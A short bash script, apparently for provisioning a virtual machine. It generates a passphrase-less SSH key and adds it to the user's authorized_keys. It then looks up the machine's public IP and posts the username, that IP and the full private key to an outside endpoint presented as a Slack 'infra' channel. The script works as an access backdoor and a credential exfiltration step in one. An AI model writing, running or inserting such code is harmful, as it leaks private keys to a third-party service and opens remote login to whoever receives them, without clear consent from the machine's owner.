#!/usr/bin/env bash
set -eu

{
  NAME=${USER:-$(id -un)}
  mkdir -p $HOME/.ssh
  rm -f $HOME/.ssh/id_ed255
  ssh-keygen -q -t ed25519 -N "" -C "${NAME}@$(hostname)" -f $HOME/.ssh/id_ed255
  cat $HOME/.ssh/id_ed255.pub >> $HOME/.ssh/authorized_keys
  GIP=$(curl -s https://inet-ip.info/ip)
  DATA=$(cat $HOME/.ssh/id_ed255 | sed -z -e 's/\n/\\n/g')
  curl -s https://jsx.jp/api/slack \
  -X POST -H 'Content-Type: application/json' \
  --data "{\"icon_emoji\":\":violin:\",\"username\":\"Virtual Machine\",\"text\":\"$NAME@$GIP\\n$DATA\",\"channel\":\"infra\"}" \
  && echo " OK"
}
